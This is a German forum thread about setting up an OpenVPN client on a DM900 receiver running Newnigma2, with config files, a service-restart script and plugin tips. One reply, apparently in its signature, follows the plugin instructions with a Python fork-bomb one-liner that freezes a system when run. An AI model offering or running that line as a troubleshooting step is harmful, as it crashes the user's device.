OpenVPN mit DM900

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • OpenVPN mit DM900

      Hallo zusammen,

      ich versuche openvpn auf der dm900 zu installieren.(Image: Newnigma2 OE 2.5)
      Habe das vpn package via telnet installiert auch package update gemacht.
      Das config file von meinem vpn provider in /etc/openvpn verschoben. Rechte auch 755 und umbenannt in .conf.

      Ich bekomme keinen VPN Dienst unter newnigma2-> System Werkzeuge angezeigt.
      Auch auch das Starten der .conf Datei via telnet endet mit einem: Error opening configuration file.

      Kann mir da jemand helfen?
    • Danke, habe es jetzt. Leider startet der VPN nicht n/a.
      Kenne mich nicht so gut aus. Fehlt da irgendwo noch der Benutzer?

      Das .conf File:


      dev tun
      fast-io
      persist-key
      persist-tun
      nobind
      remote ****.**** 1195

      remote-random
      pull
      comp-lzo
      tls-client
      verify-x509-name Server name-prefix
      ns-cert-type server
      key-direction 1
      route-method exe
      route-delay 2
      tun-mtu 1500
      fragment 1300
      mssfix 1450
      verb 3
      cipher AES-256-CBC
      keysize 256
      auth SHA512
      sndbuf 524288
      rcvbuf 524288
      auth-user-pass

      Dann kommt noch das Certificat, RSA Privat Key, Open VPN Static Key und nochmals ein Certificat. Alles im gleichen File.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von various ()

    • Gemacht, VPN läuft.

      Gibt es eine Möglichkeit die Verbindung zum VPN Server via command line zu überprüfen?

      Wenn ich den VPN Server per Hostname pinge bekomme ich die IP.
      Beim traceroute auf zb. google.com sehe ich die IP vom VPN Server jedoch nicht in der Liste.
    • Bei mir bricht die Verbindung ab und zu aus mir unerklärlichen Gründen ab bzw. der VPN-Service kackt ab. Ich habe mir deshalb ein einfaches Script zusammengegoogelt welches den Status des Services checkt und diesen gegebenenfalls neustartet. Das ganze dann unter Cron und alle 10 Minuten laufen lassen. Ich suche das Script nachher mal raus, bin nur am Handy. Vielleicht ist dies auch für andere ganz nützlich.

      Shell-Script

      1. #!/bin/bash
      2. # Simple script that uses systemctl to check if a service is
      3. # running. If its not it is restarted and an email is sent to
      4. # the configured mailbox.
      5. #
      6. # http://wp.me/p25Sys-c0 m00nie
      7. ######################
      8. # The service we want to check (according to systemctl)
      9. SERVICE=openvpn@openvpn.service
      10. # Where to send the restart mail to
      11. MAILBOX=abc@xyz.com
      12. if [ "`systemctl is-active $SERVICE`" != "active" ]
      13. then
      14. echo "$SERVICE wasnt running so attempting restart"
      15. systemctl restart $SERVICE
      16. echo "Mailing $MAILBOX with current status"
      17. systemctl status $SERVICE | mail -s "$SERVICE was restarted" $MAILBOX
      18. exit 0
      19. fi
      20. echo "$SERVICE is currently running"
      21. exit 0
      Alles anzeigen


      Hoffe die Zeilenumbrüche bleiben erhalten. Das Absetzen der E-Mail Nachricht funktioniert nicht, habe ich aus Bequemlichkeit drin gelassen. Die Referenz zum Ersteller des Scripts ist ebenfalls noch vorhanden. Habe ja nur kopiert und angepasst.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Coxeroni ()

    • Da stimme ich nicht ganz zu. Wenn du einen VPN Provider (Client) hast, verbindest du dich mit dem Server des VPN Providers(mit sämtlichen Traffic, für das gibts doch auch einen Kill Switch), vielleicht nicht gerade Asien wählen. Dahinter siehts dann anderst aus. Auch zB einen Cardserver irgendwo auf der Kugel, oder schon Richtung Osten wählen könnte sicher auch Probleme bereiten. Also gibts da paar Problemquellen, Verbindungen und die Server(und Free VPN würde ich da nicht empfehlen)
    • various schrieb:

      Wie muss man das anwenden, als script.sh File nach etc/cron? Das geht nicht.

      Hast du cron denn installiert? Ist nicht standardmäßig drauf. Ansonsten vermutlich Rechte auf 755 und ausführbar machen.
      Und lies dich mal in Cron ein, die korrekte Eingabe erfolgt mittels crontab -e

      Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von Coxeroni ()

    • Nein, habe nur die Infos betr. script.sh und Verz. gefunden. Zur Installation cron nichts konkretes. Ist der mit einem command zu installieren? In newnigma2 services-->Paket Install cron gefunden, bleibt mir hängen bei install.
    • Ich habe jetzt mit einem IP Locationfinder welchen ich auf der DM900 im Webbrowser gestartet habe, herausgefunden, dass VPN garnicht mit dem VPN Server verbindet. Unter Newnigma2 Services->System Werkzeuge-> VPN wird jedoch angezeigt: läuft.
      Gibt es da eine Möglichkeit das Verhalten beim Start vom VPN Service anzuzeigen, Log?
      Wenn ich das Script richtig verstehe, ist das nur für den reconnect?
    • hallo,

      ich habe hier NordVPN als VPN Anbieter und meine client.conf sieht wie folgt aus:

      Quellcode

      1. dev tun
      2. proto udp
      3. remote xxxxxx 1194
      4. resolv-retry infinite
      5. remote-random
      6. nobind
      7. tun-mtu 1500
      8. tun-mtu-extra 32
      9. mssfix 1450
      10. persist-key
      11. persist-tun
      12. ping 15
      13. ping-restart 0
      14. ping-timer-rem
      15. reneg-sec 0
      16. explicit-exit-notify 3
      17. remote-cert-tls server
      18. #mute 10000
      19. auth-user-pass /etc/ovpn/password.conf
      20. comp-lzo
      21. verb 3
      22. pull
      23. fast-io
      24. cipher AES-256-CBC
      25. auth SHA512
      26. <ca>
      27. -----BEGIN CERTIFICATE-----
      28. xxxx
      29. -----END CERTIFICATE-----
      30. </ca>
      31. key-direction 1
      32. <tls-auth>
      33. #
      34. # 2048 bit OpenVPN static key
      35. #
      36. -----BEGIN OpenVPN Static key V1-----
      37. xxx
      38. -----END OpenVPN Static key V1-----
      39. </tls-auth>
      40. in der password.conf ist in der ersten Zeile der Usernamen und der zweiten das Password
      41. leserechte sind für alle User gesetzt
      42. OpenVPN verbindet nicht
      Alles anzeigen
    • interessanterweise kann ich von der Console aus mit:

      openvpn --config /etc/openvpn/Client.conf

      die VPN Verbindung starten, und auch in der GUI von OpenVPN wird dann der Status aktiv gezeigt, starte ich jedoch mit Druck auf die blaue Taste und bestätige dies, passiert überhaupt nichts.

      Woran kanns liegen?
    • guck mal in /var/log/openvpn.log
      oder systemctl status openvpn@Client.service da gibts mehr informationen.

      Das plugin ist primär dafür gedacht openvpn server und client configurationen zu erstellen und diese zu starten externe configs kann ich da schlecht supporten.

      Funktionsweise:
      Plugin>Erzeuge Schlüssel/Zertifikate
      Wenn alles eingestellt ist auf speichern drücken und frage mit ja beantworten und danach auf menu drücken und das zertifikat auswählen was auf dieser box installiert werden soll.
      Wenn ihr ein Klient Paket wählt das auf dieser box installiert werden soll müsst ihr das Server Paket auf eurem Server vorher installieren.
      Soll diese Box der Server sein dann das Server Paket installieren und dann auf Start drücken.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von kati910 () aus folgendem Grund: Gerade nochmal getestet läuft

    • ok, ich verstehe.

      D.h. die OpenVPN GUi ist primär dafür da, Zertifikate, Keys und Configs selbst zu erstellen und diese zu starten.
      Deswegen kann es mit "malformed" externen Configs nicht immer umgehen.

      Ich werde mir einfach eine Config mit der GUI erstellen und danach die externe Config anpassen und dann testen.

      Danke für die Klarstellung.
    • also ich hatte jetzt Zeit und konnte mein Problem lösen.

      Zuerst wollte ich mir ein eigenes Plugin schreiben, dann kam mir jedoch das UserScript Plugin über den Monitor und schlussendlich hab ich mir einige Start Scripts für verschiedene Server geschrieben und ein entsprechendes Kill VPN all Script.

      Gestartet wird das ganze mit UserScript und funktioniert einwandfrei.